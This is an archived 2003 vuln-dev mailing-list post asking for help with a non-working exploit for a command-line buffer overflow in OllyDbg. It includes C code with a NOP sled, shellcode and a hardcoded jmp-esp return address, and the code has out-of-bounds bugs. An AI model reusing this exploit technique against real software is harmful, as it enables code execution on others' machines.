Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > vuln-dev > 03 > 060560.html (Request Expert securityfocus.com Support)

win32 command line overflows: (ex: ollydbg.exe)

From: wirepair <wirepair(at)roguemail.net>
Date: Thu Jun 05 2003 - 08:24:45 EDT


Hello all, Just messing around with win32 overflows, and i've run into a small problem with command line overflows. Ollydbg has a buffer overflow when you call a program with a large command line. (I found this when trying to debug rasphone.exe in WinXP (rasphone -f <1000'a>) I was expecting Ollydbg to run the program but it crashed itself "Error in Instruction 0x41414141 while trying to 'read' 0x41414141. So I tried to write an exploit for Ollydbg. Issue #2 Visual C++ crashes as well when i'm trying to debug ollydbg so I have to do this blindly. My exploit buffer looks like:
ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more nops>[&EIP]<nops>
I'm trying to use CreateProcess to call ollydbg.exe but it doesn't do anything, no crash no nothing. So i saved the exploit buffer to a file and tried to 'paste' it (heh). It doesn't crash even though there are over 600 characters... (Ollydbg.exe overwrites EIP at 508-511, i think i can't debug it!)
Anyways here's my code any insite on why this isn't working is greatly appreciated:
#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) { 

	char exp_buff[1024];
	int x,i;
	char ollyfile[100];
     DWORD jmpesp = 0x77E9AE59; // jmp esp call in 
kernel32.dll
	unsigned char shellcode[19] =

"\xC7\x45\xFD\x63\x6D\x64\x20\x8D\x45\xFD\x50\xB8\x35\xFD\xE6\x77\xFF\xD0"; //tiny sc 
	PROCESS_INFORMATION pi;
	STARTUPINFO si;

	if (argc != 2) {
		fprintf(stderr, "heh: %s \n", argv[0]);
		exit(1);
	}
	strncpy(ollyfile, argv[1], 99);
	ollyfile[100] = 0x00;
	
	x = strlen(ollyfile);
	memset(exp_buff, 0x90, 1024); 
     
	memcpy(exp_buff, ollyfile, x);
	exp_buff[x] = ' ';
      

	memcpy(exp_buff+200, &shellcode, 19);
	exp_buff[218] = 0x90;
	for (i = 219; i <= 508; i++) {
		exp_buff[i] = 0x90;
	}
	exp_buff[1024] = 0x00;
	memcpy(exp_buff+508, &jmpesp, 4);
	fprintf(stderr, "%s", exp_buff); //debugging heh
	CreateProcess("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL,
NULL, FALSE, 0, NULL, NULL, &si, &pi);         

        return(0);
}

Thanks
-wire


For the best comics, toys, movies, and more, please visit <http://www.tfaw.com/?qt=wmf> Received on Thu Jun 5 14:41:59 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library